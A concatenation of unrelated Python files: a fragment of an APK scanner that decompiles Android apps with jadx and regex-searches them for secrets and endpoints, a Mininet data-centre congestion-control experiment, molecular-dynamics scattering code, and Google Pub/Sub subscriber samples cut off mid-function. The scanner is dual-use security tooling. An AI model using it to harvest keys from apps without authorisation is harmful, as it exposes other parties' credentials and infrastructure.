os.chmod(self.jadx, 33268)
except Exception as error:
print("errorondependencies")
util.writeln(str(error), col.WARNING)
sys.exit()
def integrity(self):
print("integritycalled")
if os.path.exists(self.jadx) is False:
util.writeln("Can't find jadx binary.", col.WARNING)
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
while True:
util.write("Do you want to download jadx? (Y/n) ", col.OKBLUE)
try:
choice = input().lower()
if choice == "":
choice = valid["y"]
break
elif choice in valid:
choice = valid[choice]
break
else:
util.writeln("\nPlease respond with 'yes' or 'no' (or 'y' or 'n').", col.WARNING)
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting.", col.FAIL))
if choice:
util.writeln("\n** Downloading jadx...\n", col.OKBLUE)
self.dependencies()
else:
sys.exit(util.writeln("\n** Aborted.", col.FAIL))
if os.path.isfile(self.file):
print("pathisfiles")
print(self.file)
try:
print("self apk info")
self.apk = self.apk_info()
except Exception as error:
print("exception on self apk info")
util.writeln(str(error), col.WARNING)
sys.exit()
else:
return self.apk
else:
sys.exit(util.writeln("It's not a valid file!", col.WARNING))
def decompile(self):
util.writeln("** Decompiling APK...", col.OKBLUE)
args = [self.jadx, self.file, "-d", self.tempdir]
try:
args.extend(re.split(r"\s|=", self.disarg))
except Exception:
pass
comm = "%s" % (" ".join(quote(arg) for arg in args))
comm = comm.replace("\'","\"")
os.system(comm)
def extract(self, name, matches):
if len(matches):
stdout = ("[%s]" % (name))
util.writeln("\n" + stdout, col.OKGREEN)
self.fileout.write("%s" % (stdout + "\n" if self.json is False else ""))
for secret in matches:
if name == "LinkFinder":
if re.match(r"^.(L[a-z]|application|audio|fonts|image|kotlin|layout|multipart|plain|text|video).*\/.+", secret) is not None:
continue
secret = secret[len("'"):-len("'")]
stdout = ("- %s" % (secret))
print(stdout)
self.fileout.write("%s" % (stdout + "\n" if self.json is False else ""))
self.fileout.write("%s" % ("\n" if self.json is False else ""))
self.out_json["results"].append({"name": name, "matches": matches})
self.scanned = True
def scanning(self):
if self.apk is None:
sys.exit(util.writeln("** Undefined package. Exit!", col.FAIL))
util.writeln("\n** Scanning against '%s'" % (self.apk.package), col.OKBLUE)
self.out_json["package"] = self.apk.package
self.out_json["results"] = []
with open(self.pattern) as regexes:
regex = json.load(regexes)
for name, pattern in regex.items():
if isinstance(pattern, list):
for p in pattern:
try:
thread = threading.Thread(target = self.extract, args = (name, util.finder(p, self.tempdir)))
thread.start()
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting...", col.FAIL))
else:
try:
thread = threading.Thread(target = self.extract, args = (name, util.finder(pattern, self.tempdir)))
thread.start()
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting...", col.FAIL))
def cleanup(self):
shutil.rmtree(self.tempdir)
if self.scanned:
self.fileout.write("%s" % (json.dumps(self.out_json, indent=4) if self.json else ""))
self.fileout.close()
fileold = os.path.expanduser("~/apkscanner/results/"+self.package+".txt")
filenew = self.output
if os.path.exists(fileold):
print("Comparing new and old results")
file_1 = open(fileold, 'r')
file_2 = open(filenew, 'r')
print("Comparing files ", " @ " + 'file1.txt', " # " + 'file2.txt', sep='\n')
file_1_line = file_1.readline()
file_2_line = file_2.readline()
# Use as a COunter
line_no = 1
print()
while file_1_line != '' or file_2_line != '':
# Removaing whitespaces
file_1_line = file_1_line.rstrip()
file_2_line = file_2_line.rstrip()
# Compare the lines from both file
if file_1_line != file_2_line:
print(file_1_line + "tidak sama dengan" + file_2_line)
print("New Findings on : " + self.file)
os.remove(fileold)
shutil.move(filenew, fileold)
break
# Read the next line from the file
file_1_line = file_1.readline()
file_2_line = file_2.readline()
line_no += 1
else:
os.remove(filenew)
file_1.close()
file_2.close()
else:
print("first time scanned, saving results")
shutil.move(filenew, fileold)
print("%s\n** Results saved into '%s%s%s%s'%s." % (col.HEADER, col.ENDC, col.OKGREEN, fileold, col.HEADER, col.ENDC))
else:
self.fileout.close()
os.remove(self.output)
util.writeln("\n** Done with nothing. ¯\\_(ツ)_/¯", col.WARNING)
|
incast.py
|
#!/usr/bin/python
import sys
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.log import lg
from mininet.node import CPULimitedHost
from mininet.link import TCLink
from mininet.link import TCIntf
from mininet.util import irange, custom, quietRun, dumpNetConnections
from mininet.cli import CLI
from mininet.log import setLogLevel, info, warn, error, debug
from time import sleep, time
import multiprocessing
from subprocess import Popen, PIPE
import re
import termcolor as T
import argparse
from random import choice, shuffle,randint,randrange,uniform
import random
import os
from util.monitor import monitor_cpu, monitor_qlen, monitor_devs_ng
parser = argparse.ArgumentParser(description="DCTCP tester (Star topology)")
parser.add_argument('--bw', '-B',
dest="bw",
action="store",
help="Bandwidth of links",
required=True)
parser.add_argument('--dir', '-d',
dest="dir",
action="store",
help="Directory to store outputs",
required=True)
parser.add_argument('-n',
dest="n",
action="store",
help="Number of nodes in star. Must be >= 3",
required=True)
parser.add_argument('-t',
dest="t",
action="store",
help="Seconds to run the experiment",
default=30)
parser.add_argument('-u', '--udp',
dest="udp",
action="store_true",
help="Run UDP test",
default=False)
parser.add_argument('--use-hfsc',
dest="use_hfsc",
action="store_true",
help="Use HFSC qdisc",
default=False)
parser.add_argument('--maxq',
dest="maxq",
action="store",
help="Max buffer size of each interface",
default=425)
parser.add_argument('--speedup-bw',
dest="speedup_bw",
action="store",
help="Speedup bw for switch interfaces",
default=-1)
parser.add_argument('--dctcp',
dest="dctcp",
action="store_true",
help="Enable DCTCP (net.ipv4.tcp_dctcp_enable)",
default=False)
parser.add_argument('--mptcp',
dest="mptcp",
action="store_true",
help="Enable MPTCP ",
default=False)
parser.add_argument('--mdtcp',
dest="mdtcp",
action="store_true",
help="Enable MDTCP ",
default=False)
parser.add_argument('--ecn',
dest="ecn",
action="store_true",
help="Enable ECN (net.ipv4.tcp_ecn)",
default=False)
parser.add_argument('--use-bridge',
dest="use_bridge",
action="store_true",
help="Use Linux Bridge as switch",
default=False)
parser.add_argument('--tcpdump',
dest="tcpdump",
action="store_true",
help="Run tcpdump on host interfaces",
default=False)
parser.add_argument('--tcp_reddctcp',
dest="tcp_reddctcp",
action="store_true",
help="test tcp with red config as DCTCP",
default=False)
parser.add_argument('--qmaxhost',
dest="qmaxhost",
type=int,
help="maximum host interace queue limit",
default=200)
parser.add_argument('--fct',
dest="fct",
type=int,
help="flow completion test ",
default=0)
parser.add_argument('--delay',dest="delay",default="0.075ms 0.05ms distribution normal ")
args = parser.parse_args()
args.n = int(args.n)
args.bw = float(args.bw)
if args.speedup_bw == -1:
args.speedup_bw = args.bw
args.n = max(args.n, 2)
if not os.path.exists(args.dir):
os.makedirs(args.dir)
if args.use_bridge:
from mininet.node import Bridge as Switch
else:
from mininet.node import OVSKernelSwitch as Switch
lg.setLogLevel('output')
class StarTopo(Topo):
def __init__(self, n=3, bw=100):
# Add default members to class.
super(StarTopo, self ).__init__()
# Host and link configuration
hconfig = {'cpu': 0.1}
ldelay_config = {'bw': 1000, 'delay': args.delay,'max_queue_size': args.qmaxhost}
if args.dctcp or args.mdtcp or args.tcp_reddctcp :
lconfig = {'bw': bw,
'delay': 0,
'max_queue_size': int(args.maxq),
'enable_ecn': True,
'red_burst': 30,
'red_limit':100000,
'red_min':30000,
'red_max':31000,
'red_avpkt':1000,
'red_prob':1.0,
'use_hfsc': args.use_hfsc,
'speedup': float(args.speedup_bw)
}
elif args.ecn :
lconfig = {'bw':bw,
'delay': 0,
'max_queue_size': int(args.maxq),
'enable_ecn': True,
'red_burst': 53,
'red_limit':120000,
'red_min':30000,
'red_max':100000,
'red_prob':0.01,
'red_avpkt':1000,
'use_hfsc': args.use_hfsc,
'speedup': float(args.speedup_bw)
}
else:
lconfig = {'bw': bw,
'delay': 0,
'max_queue_size': int(args.maxq),
'enable_red': True,
'red_burst': 53,
'red_limit':120000,
'red_min':30000,
'red_max':100000,
'red_prob':0.01,
'red_avpkt':1000,
'use_hfsc': args.use_hfsc,
'speedup': float(args.speedup_bw)
}
print '~~~~~~~~~~~~~~~~~> BW = %s' % bw
# Create switch and host nodes
for i in xrange(n):
self.addHost('h%d' % (i+1), **hconfig)
self.addSwitch('s1')
# add link b/n receiver and switch (swith interface will be s1-eth1)
self.addLink('s1', 'h1',intf=TCIntf,params1=lconfig, params2=lconfig)
#self.addLink('h1', 's1', **lconfig)
for i in xrange(1, n):
if args.mptcp or args.mdtcp:
for k in range (4):
self.addLink('h%d' % (i+1), 's1',intf=TCIntf,params1=ldelay_config, params2=ldelay_config)
self.addLink('h%d' % (i+1), 's1',intf=TCIntf,params1=ldelay_config, params2=ldelay_config)
# self.addLink('h%d' % (i+1), 's1', **ldelay_config)
def waitListening(client, server, port):
"Wait until server is listening on port"
if not 'telnet' in client.cmd('which telnet'):
raise Exception('Could not find telnet')
cmd = ('sh -c "echo A | telnet -e A %s %s"' %
(server.IP(), port))
# print(client.cmd(cmd))
while 'Connected' not in client.cmd(cmd):
print('waiting for', server,
'to listen on port', port, '\n')
sleep(.5)
def progress(t):
while t > 0:
print T.colored(' %3d seconds left \r' % (t), 'cyan'),
t -= 1
sys.stdout.flush()
sleep(1)
print '\r\n'
def enable_tcp_ecn():
Popen("sysctl -w net.ipv4.tcp_ecn=1", shell=True).wait()
Popen("sudo sysctl -w net.mptcp.mptcp_enabled=0",shell=True).wait()
Popen("sysctl -w net.ipv4.tcp_congestion_control=reno", shell=True).wait()
def disable_tcp_ecn():
os.system("sysctl -w net.ipv4.tcp_ecn=0")
os.system("sysctl -w net.mptcp.mptcp_enabled=0")
def enableMPTCP(subflows):
Popen("sysctl -w net.ipv4.tcp_ecn=0",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_enabled=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_debug=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_path_manager=ndiffports",shell=True).wait
Popen("echo -n %i > /sys/module/mptcp_ndiffports/parameters/num_subflows" % int(subflows),shell=True).wait()
# os.system("sudo sysctl -w net.mptcp.mptcp_path_manager=fullmesh")
Popen("sysctl -w net.ipv4.tcp_congestion_control=olia",shell=True).wait()
def enableMDTCP(subflows):
Popen("sysctl -w net.ipv4.tcp_ecn=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_enabled=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_debug=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_path_manager=ndiffports",shell=True).wait()
Popen("echo -n %i > /sys/module/mptcp_ndiffports/parameters/num_subflows" % int(subflows),shell=True).wait()
# os.system("sudo sysctl -w net.mptcp.mptcp_path_manager=fullmesh")
Popen("sysctl -w net.ipv4.tcp_congestion_control=mdtcp",shell=True).wait()
def enable_dctcp():
# enable_tcp_ecn()
# Popen("sysctl -w net.mptcp.mptcp_enabled=0",shell=True).wait()
os.system("sysctl -w net.ipv4.tcp_ecn=1")
os.system("sysctl -w net.ipv4.tcp_congestion_control=dctcp")
# Popen("echo dctcp > /proc/sys/net/ipv4/tcp_congestion_control",shell=True).wait()
# Popen("echo 1 > /proc/sys/net/ipv4/tcp_ecn",shell=True).wait()
def disable_dctcp():
disable_tcp_ecn()
# Popen("sysctl -w net.ipv4.tcp_congestion_control=reno", shell=True).wait()
# Popen("sysctl -w net.mptcp.mptcp_enabled=0",shell=True).wait()
def main():
seconds = int(args.t)
setLogLevel('output')
# Reset to known state
# disable_dctcp()
disable_tcp_ecn()
sleep(2)
# enable_dctcp()
cong_ctrl="reno"
if args.ecn:
enable_tcp_ecn()
cong_ctrl="reno"
elif args.dctcp:
# enable_tcp_ecn()
enable_dctcp()
cong_ctrl="dctcp"
elif args.tcp_reddctcp:
enable_tcp_ecn()
cong_ctrl="reno"
elif args.mptcp:
enableMPTCP(4)
cong_ctrl="olia"
elif args.mdtcp:
enableMDTCP(4)
cong_ctrl="mdtcp"
else:
os.system("sysctl -w net.ipv4.tcp_congestion_control=reno")
topo = StarTopo(n=args.n, bw=args.bw)
net = Mininet(topo=topo, host=CPULimitedHost,switch=Switch,
autoStaticArp=True)
net.start()
nodes = net.hosts + net.switches
for node in nodes:
node.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
node.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
node.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
for port in node.ports:
if str.format('{}', port) != 'lo':
#node.cmd(str.format('ethtool --offload {} tx off rx off gro off tso off', port))
node.cmd(str.format('ethtool -K {} gso off tso off gro off tx off rx off', port))
s1= net.getNodeByName('s1')
for port in s1.ports:
if str.format('{}', port) == 's1-eth1':
node.cmd(str.format('tc qdisc del dev {} root',port))
if args.mdtcp or args.dctcp or args.tcp_reddctcp:
node.cmd(str.format('sudo ip link set txqueuelen {} dev {}',args.maxq,port))
node.cmd(str.format('tc qdisc replace dev {} root handle 5:0 htb default 1', port))
node.cmd(str.format('tc class replace dev {} parent 5:0 classid 5:1 htb rate {}Mbit ceil {}Mbit burst 1516', port,args.bw,args.bw))
node.cmd(str.format('tc qdisc replace dev {} parent 5:1 handle 10: red limit 100000 min 30000 max 31000 avpkt 1000 burst 30 \
ecn bandwidth {} probability 1.0 ', port,args.bw))
else:
node.cmd(str.format('sudo ip link set txqueuelen {} dev {}',args.maxq,port))
node.cmd(str.format('tc qdisc replace dev {} root handle 5:0 htb default 1', port))
node.cmd(str.format('tc class replace dev {} parent 5:0 classid 5:1 htb rate {}Mbit ceil {}Mbit burst 1516', port,args.bw,args.bw))
node.cmd(str.format('tc qdisc replace dev {} parent 5:1 handle 10: red limit 120000 min 30000 max 100000 avpkt 1000 burst 53 \
bandwidth {} probability 0.01',port,args.bw))
#node.cmd(str.format('tc qdisc replace dev {} parent 10:1 handle 20: netem delay {} limit {} ', port,args.delay, args.maxq))
# CLI(net)
for i in xrange(1,args.n):
h=net.getNodeByName('h%d'%(i+1))
cmd="./tcp_server/tcp_server >> test_log &"
h.cmd(cmd,shell=True)
print(h.IP())
sleep(2)
h1 = net.getNodeByName('h1')
#clients = [net.getNodeByName('h%d' % (i+1)) for i in xrange(1, args.n)]
#waitListening(clients[0], h1, 5001)
monitors = []
# monitor = multiprocessing.Process(target=monitor_cpu, args=('%s/cpu.txt' % args.dir,))
# monitor.start()
# monitors.append(monitor)
monitor = multiprocessing.Process(target=monitor_qlen, args=('s1-eth1', 0.01, '%s/qlen_s1-eth1.txt' % (args.dir)))
monitor.start()
monitors.append(monitor)
# sleep(2)
# monitor = multiprocessing.Process(target=monitor_devs_ng, args=('%s/txrate.txt' % args.dir, 0.01))
# monitor.start()
# monitors.append(monitor)
Popen("rmmod tcp_probe; modprobe tcp_probe port=5001; cat /proc/net/tcpprobe > %s/tcp_probe.txt" % args.dir, shell=True)
Popen("tcpdump -i s1-eth1 -w %s/log.pcap -s 96 & " % args.dir, shell=True)
for i in xrange(args.n-1,args.n):
print ("./tcp_client conf/"+str(i)+"servers.conf t.csv")
clnt_cmd="./tcp_client/tcp_client tcp_client/conf/"+str(i)+"servers.conf "+args.dir+"/fct_fanout"+str(i)+".csv"
h1.cmd(clnt_cmd,shell=True)
print("after Client")
wtime=seconds
sleep(wtime)
# progress(10)
for monitor in monitors:
monitor.terminate()
# for h in net.hosts:
# h.cmd("netstat -s > %s/nstat_%s.txt" % (args.dir,h.IP()), shell=True)
net.stop()
# disable_dctcp()
disable_tcp_ecn()
Popen("killall -9 cat ping top iperf bwm-ng tcpprobe ", shell=True).wait()
if __name__ == '__main__':
main()
|
van_hove.py
|
import multiprocessing
import sys
import itertools as it
import numpy as np
import mdtraj as md
from progressbar import ProgressBar
from scattering.utils.utils import get_dt
from scattering.utils.constants import get_form_factor
def compute_van_hove(trj, chunk_length, water=False,
r_range=(0, 1.0), bin_width=0.005, n_bins=None,
self_correlation=True, periodic=True, opt=True, partial=False):
"""Compute the partial van Hove function of a trajectory
Parameters
----------
trj : mdtraj.Trajectory
trajectory on which to compute the Van Hove function
chunk_length : int
length of time between restarting averaging
water : bool
use X-ray form factors for water that account for polarization
r_range : array-like, shape=(2,), optional, default=(0.0, 1.0)
Minimum and maximum radii.
bin_width : float, optional, default=0.005
Width of the bins in nanometers.
n_bins : int, optional, default=None
The number of bins. If specified, this will override the `bin_width`
parameter.
self_correlation : bool, default=True
Whether or not to include the self-self correlations
Returns
-------
r : numpy.ndarray
r positions generated by histogram binning
g_r_t : numpy.ndarray
Van Hove function at each time and position
"""
n_physical_atoms = len([a for a in trj.top.atoms if a.element.mass > 0])
unique_elements = list(set([a.element for a in trj.top.atoms if a.element.mass > 0]))
data = []
for elem1, elem2 in it.combinations_with_replacement(unique_elements[::-1], 2):
data.append([
trj,
chunk_length,
'element {}'.format(elem1.symbol),
'element {}'.format(elem2.symbol),
r_range,
bin_width,
n_bins,
self_correlation,
periodic,
opt,
])
manager = multiprocessing.Manager()
partial_dict = manager.dict()
jobs = []
version_info = sys.version_info
for d in data:
with multiprocessing.Pool(processes=multiprocessing.cpu_count()) as pool:
if version_info.major == 3 and version_info.minor <= 7:
p = pool.Process(target=worker, args=(partial_dict, d))
elif version_info.major == 3 and version_info.minor >= 8:
ctx = multiprocessing.get_context()
p = pool.Process(ctx, target=worker, args=(partial_dict, d))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
r = partial_dict['r']
del partial_dict['r']
if partial:
return partial_dict
norm = 0
g_r_t = None
for key, val in partial_dict.items():
elem1, elem2 = key
concentration1 = trj.atom_slice(trj.top.select(elem1)).n_atoms / n_physical_atoms
concentration2 = trj.atom_slice(trj.top.select(elem2)).n_atoms / n_physical_atoms
form_factor1 = get_form_factor(element_name=elem1.split()[1], water=water)
form_factor2 = get_form_factor(element_name=elem2.split()[1], water=water)
coeff = form_factor1 * concentration1 * form_factor2 * concentration2
if g_r_t is None:
g_r_t = np.zeros_like(val)
g_r_t += val * coeff
norm += coeff
# Reshape g_r_t to better represent the discretization in both r and t
g_r_t_final = np.empty(shape=(chunk_length, len(r)))
for i in range(chunk_length):
g_r_t_final[i, :] = np.mean(g_r_t[i::chunk_length], axis=0)
g_r_t_final /= norm
t = trj.time[:chunk_length]
return r, t, g_r_t_final
def worker(return_dict, data):
key = (data[2], data[3])
r, g_r_t_partial = compute_partial_van_hove(*data)
return_dict[key] = g_r_t_partial
return_dict['r'] = r
def compute_partial_van_hove(trj, chunk_length=10, selection1=None, selection2=None,
r_range=(0, 1.0), bin_width=0.005, n_bins=200,
self_correlation=True, periodic=True, opt=True):
"""Compute the partial van Hove function of a trajectory
Parameters
----------
trj : mdtraj.Trajectory
trajectory on which to compute the Van Hove function
chunk_length : int
length of time between restarting averaging
selection1 : str
selection to be considered, in the style of MDTraj atom selection
selection2 : str
selection to be considered, in the style of MDTraj atom selection
r_range : array-like, shape=(2,), optional, default=(0.0, 1.0)
Minimum and maximum radii.
bin_width : float, optional, default=0.005
Width of the bins in nanometers.
n_bins : int, optional, default=None
The number of bins. If specified, this will override the `bin_width`
parameter.
self_correlation : bool, default=True
Whether or not to include the self-self correlations
Returns
-------
r : numpy.ndarray
r positions generated by histogram binning
g_r_t : numpy.ndarray
Van Hove function at each time and position
"""
unique_elements = (
set([a.element for a in trj.atom_slice(trj.top.select(selection1)).top.atoms]),
set([a.element for a in trj.atom_slice(trj.top.select(selection2)).top.atoms]),
)
if any([len(val) > 1 for val in unique_elements]):
raise UserWarning(
'Multiple elements found in a selection(s). Results may not be '
'direcitly comprable to scattering experiments.'
)
# Don't need to store it, but this serves to check that dt is constant
dt = get_dt(trj)
pairs = trj.top.select_pairs(selection1=selection1, selection2=selection2)
n_chunks = int(trj.n_frames / chunk_length)
g_r_t = None
pbar = ProgressBar()
for i in pbar(range(n_chunks)):
times = list()
for j in range(chunk_length):
times.append([chunk_length*i, chunk_length*i+j])
r, g_r_t_frame = md.compute_rdf_t(
traj=trj,
pairs=pairs,
times=times,
r_range=r_range,
bin_width=bin_width,
n_bins=n_bins,
period_length=chunk_length,
self_correlation=self_correlation,
periodic=periodic,
opt=opt,
)
if g_r_t is None:
g_r_t = np.zeros_like(g_r_t_frame)
g_r_t += g_r_t_frame
return r, g_r_t
|
subscriber.py
|
#!/usr/bin/env python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to perform basic operations on
subscriptions with the Cloud Pub/Sub API.
For more information, see the README.md under /pubsub and the documentation
at https://cloud.google.com/pubsub/docs.
"""
import argparse
def list_subscriptions_in_topic(project_id, topic_name):
"""Lists all subscriptions for a given topic."""
# [START pubsub_list_topic_subscriptions]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_name)
for subscription in publisher.list_topic_subscriptions(topic_path):
print(subscription)
# [END pubsub_list_topic_subscriptions]
def list_subscriptions_in_project(project_id):
"""Lists all subscriptions in the current project."""
# [START pubsub_list_subscriptions]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(project_id)
for subscription in subscriber.list_subscriptions(project_path):
print(subscription.name)
# [END pubsub_list_subscriptions]
def create_subscription(project_id, topic_name, subscription_name):
"""Create a new pull subscription on the given topic."""
# [START pubsub_create_pull_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_name)
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
subscription = subscriber.create_subscription(
subscription_path, topic_path)
print('Subscription created: {}'.format(subscription))
# [END pubsub_create_pull_subscription]
def create_push_subscription(project_id,
topic_name,
subscription_name,
endpoint):
"""Create a new push subscription on the given topic."""
# [START pubsub_create_push_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
# TODO endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_name)
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
push_config = pubsub_v1.types.PushConfig(
push_endpoint=endpoint)
subscription = subscriber.create_subscription(
subscription_path, topic_path, push_config)
print('Push subscription created: {}'.format(subscription))
print('Endpoint for subscription is: {}'.format(endpoint))
# [END pubsub_create_push_subscription]
def delete_subscription(project_id, subscription_name):
"""Deletes an existing Pub/Sub topic."""
# [START pubsub_delete_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
subscriber.delete_subscription(subscription_path)
print('Subscription deleted: {}'.format(subscription_path))
# [END pubsub_delete_subscription]
def update_subscription(project_id, subscription_name, endpoint):
"""
Updates an existing Pub/Sub subscription's push endpoint URL.
Note that certain properties of a subscription, such as
its topic, are not modifiable.
"""
# [START pubsub_update_push_configuration]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
# TODO endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
push_config = pubsub_v1.types.PushConfig(
push_endpoint=endpoint)
subscription = pubsub_v1.types.Subscription(
name=subscription_path,
push_config=push_config)
update_mask = {
'paths': {
'push_config',
}
}
subscriber.update_subscription(subscription, update_mask)
result = subscriber.get_subscription(subscription_path)
print('Subscription updated: {}'.format(subscription_path))
print('New endpoint for subscription is: {}'.format(
result.push_config))
# [END pubsub_update_push_configuration]
def receive_messages(project_id, subscription_name):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_async_pull]
# [START pubsub_quickstart_subscriber]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
# The `subscription_path` method creates a fully qualified identifier
# in the form `projects/{project_id}/subscriptions/{subscription_name}`
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message))
message.ack()
subscriber.subscribe(subscription_path, callback=callback)
# The subscriber is non-blocking. We must keep the main thread from
# exiting to allow it to process messages asynchronously in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_async_pull]
# [END pubsub_quickstart_subscriber]
def receive_messages_with_custom_attributes(project_id, subscription_name):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_sync_pull_custom_attributes]
# [START pubsub_subscriber_async_pull_custom_attributes]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message.data))
if message.attributes:
print('Attributes:')
for key in message.attributes:
value = message.attributes.get(key)
print('{}: {}'.format(key, value))
message.ack()
subscriber.subscribe(subscription_path, callback=callback)
# The subscriber is non-blocking, so we must keep the main thread from
# exiting to allow it to process messages in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_async_pull_custom_attributes]
# [END pubsub_subscriber_sync_pull_custom_attributes]
def receive_messages_with_flow_control(project_id, subscription_name):
"""Receives messages from a pull subscription with flow control."""
# [START pubsub_subscriber_flow_settings]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message.data))
message.ack()
# Limit the subscriber to only have ten outstanding messages at a time.
flow_control = pubsub_v1.types.FlowControl(max_messages=10)
subscriber.subscribe(
subscription_path, callback=callback, flow_control=flow_control)
# The subscriber is non-blocking, so we must keep the main thread from
# exiting to allow it to process messages in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_flow_settings]
def synchronous_pull(project_id, subscription_name):
"""Pulling messages synchronously."""
# [START pubsub_subscriber_sync_pull]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
NUM_MESSAGES = 3
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
ack_ids = []
for received_message in response.received_messages:
print("Received: {}".format(received_message.message.data))
ack_ids.append(received_message.ack_id)
# Acknowledges the received messages so they will not be sent again.
subscriber.acknowledge(subscription_path, ack_ids)
print('Received and acknowledged {} messages. Done.'.format(
len(response.received_messages)))
# [END pubsub_subscriber_sync_pull]
def synchronous_pull_with_lease_management(project_id, subscription_name):
"""Pulling messages synchronously with lease management"""
# [START pubsub_subscriber_sync_pull_with_lease]
import logging
import multiprocessing
import random
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
NUM_MESSAGES = 2
ACK_DEADLINE = 30
SLEEP_TIME = 10
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
multiprocessing.log_to_stderr()
logger = multiprocessing.get_logger()
logger.setLevel(logging.INFO)
def worker(msg):
"""Simulates a long-running process."""
RUN_TIME = random.randint(1, 60)
logger.info('{}: Running {} for {}s'.format(
time.strftime("%X", time.gmtime()), msg.message.data, RUN_TIME))
time.sleep(RUN_TIME)
# `processes` stores process as key and ack id and message as values.
processes = dict()
for message in response.received_messages:
process = multiprocessing.Process(target=worker, args=(message,))
processes[process] = (message.ack_id, message.message.data)
process.start()
while processes:
for process in list(processes):
ack_id, msg_data = processes[process]
# If the process is still running, reset the ack deadline as
# specified by ACK_DEADLINE once every while as specified
# by SLEEP_TIME.
if process.is_alive():
# `ack_deadline_seconds` must be between 10 to 600.
subscriber.modify_ack_deadline(
subscription_path,
[ack_id],
ack_deadline_seconds=ACK_DEADLINE)
logger.info('{}: Reset ack deadline for {} for {}s'.format(
time.strftime("%X", time.gmtime()),
msg_data, ACK_DEADLINE))
# If the processs is finished, acknowledges using `ack_id`.
else:
subscriber.acknowledge(subscription_path, [ack_id])
logger.info("{}: Acknowledged {}".format(
time.strftime("%X", time.gmtime()), msg_data))
processes.pop(process)
# If there are still processes running, sleeps the thread.
if processes:
time.sleep(SLEEP_TIME)
print('Received and acknowledged {} messages. Done.'.format(
len(response.received_messages)))
# [END pubsub_subscriber_sync_pull_with_lease]
def listen_for_errors(project_id, subscription_name):
"""Receives messages and catches errors from a pull subscription."""
# [START pubsub_subscriber_error_listener]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
